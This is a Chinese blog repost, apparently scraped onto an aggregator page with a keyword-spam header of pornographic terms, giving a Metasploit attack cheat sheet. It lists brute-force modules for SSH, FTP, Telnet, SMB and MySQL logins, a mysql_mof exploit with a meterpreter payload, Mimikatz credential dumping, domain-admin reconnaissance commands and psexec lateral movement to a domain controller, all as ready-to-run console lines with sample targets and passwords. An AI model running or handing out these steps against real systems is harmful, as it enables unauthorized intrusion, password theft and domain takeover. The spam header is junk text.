日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

msf各种弱口令爆破

發布時間:2023/12/2 编程问答 30 豆豆
生活随笔 收集整理的這篇文章主要介紹了 msf各种弱口令爆破 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

msf各種弱口令爆破

Msf:

記錄下msf各個爆破弱口令的模塊

run post/windows/gather/arp_scanner RHOSTS=10.10.10.0/24?使用arp_scanner模塊 檢測在線主機

?

metasploit 增加路由

route add 10.10.1.3 255.255.255.0 1

使用掃描模塊

use scanner/portscan/tcp

爆破ssh

Msf>use auxiliary/scanner/ssh/ssh_login

爆破ftp

Msf>use auxiliary/scanner/ftp/ftp_login

爆破telnet

Msf>use auxiliary/scanner/telnet/telnet_login

爆破smb

auxiliary/scanner/smb/smb_login

爆破Mysql

use scanner/mysql/mysql_login msf auxiliary(scanner/mysql/mysql_login) > set USERNAME root USERNAME => root msf auxiliary(scanner/mysql/mysql_login) > set PASS_FILE /root/passlist.txt PASS_FILE => /root/passlist.txt

使用mof模塊進行權限獲取

use windows/mysql/mysql_mof msf exploit(windows/mysql/mysql_mof) > set PASSWORD 123456 PASSWORD => 123456 msf exploit(windows/mysql/mysql_mof) > set rhost 10.10.1.3 rhost => 10.10.1.3 msf exploit(windows/mysql/mysql_mof) > set USERNAME root USERNAME => root msf exploit(windows/mysql/mysql_mof) > set payload windows/meterpreter/bind_tcp payload => windows/meterpreter/bind_tcp msf exploit(windows/mysql/mysql_mof) > exploit

Mimikatz導出hash

<p>meterpreter &gt; load mimikatz</p> <p>meterpreter &gt; kerberos</p>

一些域內的命令

查看域 net view /domain 查看當前域中的計算機 net view 查看CORP域中的計算機 net view /domain:CORP Ping計算機名可以得到IP ping Wangsong-PC 獲取所有域的用戶列表 net user /domain 獲取域用戶組信息 net group /domain 獲取當前域管理員信息 net group "domain admins" /domain 查看域時間及域服務器的名字 net time /domain net time /domain 就可以知道域的計算機名 WIN-723O786H6KU.moonsec.com 10.10.1.2 這個就是域控 net group "domain admins" /domain

反彈shell

msf exploit(windows/smb/psexec) > set RHOST 10.10.1.2 RHOST => 10.10.1.2 msf exploit(windows/smb/psexec) > set SMBDomain moonsec SMBDomain => moonsec msf exploit(windows/smb/psexec) > set SMBUser administrator SMBUser => administrator msf exploit(windows/smb/psexec) > set SMBPass xxx123456.. SMBPass => xxx123456.. msf exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp payload => windows/meterpreter/bind_tcp msf exploit(windows/smb/psexec) > exploit

總結

以上是生活随笔為你收集整理的msf各种弱口令爆破的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。